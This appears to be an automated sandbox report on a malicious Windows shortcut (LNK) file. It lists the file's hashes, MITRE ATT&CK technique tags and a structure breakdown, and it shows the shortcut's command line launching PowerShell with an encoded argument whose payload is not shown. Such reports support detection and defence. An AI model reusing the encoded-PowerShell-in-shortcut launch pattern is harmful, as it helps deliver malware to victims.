Malicious

0906e26681d7866715a52648581d03bd

LNK File | MD5: 0906e26681d7866715a52648581d03bd | Size: 2.38 KB | application/x-ms-shortcut

LNK, Malicious, LOLBin, LOLBin:powershell.exe, Execution: CMD in LNK, T1059.003, T1202: Indirect Command Execution, T1204.002, Execution: PowerShell in LNK, T1059.001, PowerShell, Batch Command, PowerShell Call, DeObfuscated
Characteristics
Hash | Hash Value
MD5 | 0906e26681d7866715a52648581d03bd
Sha1 | c2f5371932deca1e5b939f8dba109884da2c7131
Sha256 | de36a43adddc063311313a12aa800d63af9df0e5e7379c1a2b16aee92d4e5c66
Sha384 | 983f349d2c21295838eaca64ab379c21f141faef9fc3b0d2e8413b89577d64e1e06cc031c85ac81baef71e70add8279b
Sha512 | 146a72d44cd3c1f26cdf5cf2499703c6d59e414032bbaafabdaf882bda4d05f7585bbe4b10c9126f5f99db9854b01d58b11d8f679016619db881e25948fd42f3
SSDeep | 48:8r5aqzfSwuolMol3a/aklkQVh6FtmA4a:8r5vPa/vKQVMeA4
TLSH | 1841642809F611FEF93787B99BF873F34562F7E28C285ABC108067424366050B4A3E79
File Structure
0906e26681d7866715a52648581d03bd | LNK, Malicious, LOLBin, LOLBin:powershell.exe, Execution: CMD in LNK, T1059.003, T1202: Indirect Command Execution, T1204.002, Execution: PowerShell in LNK, T1059.001, PowerShell, Batch Command, PowerShell Call, DeObfuscated | Malicious
LNK CommandLine | PowerShell, Batch Command, PowerShell Call, Contains Base64 Block, Base64 Block, DeObfuscated | Malicious
[PowerShell Command] | PowerShell, DeObfuscated, Contains Base64 Block, Base64 Block | Malicious
[Deobfuscated PS] | DeObfuscated, PowerShell | Malicious
[Base64-Block] | Base64 Block
[Lnk Summary] | Malicious
Characteristics
No malware configuration was found at this point.
Artefacts
Name | Value | Location
LNK: Command Execution

powershell.exe powershell -E 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

Malicious

0906e26681d7866715a52648581d03bd

Deobfuscated PowerShell

-e "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"

Malicious

0906e26681d7866715a52648581d03bd > LNK CommandLine > [PowerShell Command]
